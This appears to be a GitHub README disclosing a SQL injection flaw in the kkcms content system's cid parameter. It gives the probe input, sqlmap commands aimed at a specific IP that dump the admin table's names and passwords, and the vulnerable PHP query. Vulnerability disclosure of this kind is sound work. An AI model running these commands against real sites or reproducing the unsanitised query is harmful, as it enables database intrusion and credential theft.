Skip to content
/ kkcms_SQLi Public

There is a serious SQL injection vulnerability in kkcms. The following is a vulnerability analysis.

0 stars 0 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

PrecursorYork/kkcms_SQLi

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

6 Commits
0.png
0.png
 
 
1.png
1.png
 
 
2.png
2.png
 
 
3.png
3.png
 
 
4.png
4.png
 
 
5.png
5.png
 
 
README.md
README.md
 
 

Repository files navigation

SQL injection vulnerability analysis in kkcms

There is a vulnerability classified as severe in the cid parameter in templates/vlist. php. Performing SQL injection attacks on the cid parameter can obtain database information for the entire system.

The kkcms source code has been uploaded to the 'kkcms_SourceCode' branch in this repository.

Here is its original code repository address:kkcms

The following is the process of analysis:

1. Install and deploy kkcms on the server:

2. It was found that inputting special characters into the cid parameter in the vlist.php page will return an exception page. It is speculated that there is a SQL injection attack vulnerability here.

  • Inputcid=1 The server returns to the normal page.

  • Inputcid=1'to try closing the SQL query statement: The server returned an exception page. This indicates the existence of an SQL injection vulnerability.

3. Use SQL map tool for testing to confirm the existence of SQL injection vulnerabilities. It will cause the database information of the entire system to be leaked. Here is an example of administrator account password leakage:

  • python sqlmap.py -u "http://47.120.46.90/vlist.php?cid=1" --tables


  • python sqlmap.py -u "http://47.120.46.90/vlist.php?cid=1" --columns -T xtcms_manager


  • python sqlmap.py -u "http://47.120.46.90/vlist.php?cid=1" --dump -T xtcms_manager -C "m_name,m_password"

4. Check source code

  1. /vlist.php:

       <?php 
include('system/inc.php');
include('template/'.$xtcms_bdyun.'/vlist.php');
?>

    Discovered the inclusion of two PHP files:/system/inc.php and/template/wapian/vlist.php. Among them, /system/inc.php'contains partially written escape functions.

  2. Check /template/wapian/vlist.php, discovered the key code:

    <?php
if ($_GET['cid'] != 0){
 ?>                  
<?php
$result = mysql_query('select * from xtcms_vod_class where c_pid='.$_GET['cid'].' order by c_sort desc,c_id asc');
while ($row = mysql_fetch_array($result))
{
echo '<a href="./vlist.php?cid='.$row['c_id'].'" class="acat" style="white-space: pre-wrap;margin-bottom: 4px;">'.$row['c_name'].'</a>';
}
?>

    There is no reference to the source code.$_GET ['cid']variable is filtered by directly using single quotation marks for wrapping, and the escape function written in/system/inc.phpis not used for querying. This is where typical SQL injection vulnerabilities lie.

About

There is a serious SQL injection vulnerability in kkcms. The following is a vulnerability analysis.

Resources

Readme
Activity

Stars

0 stars

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published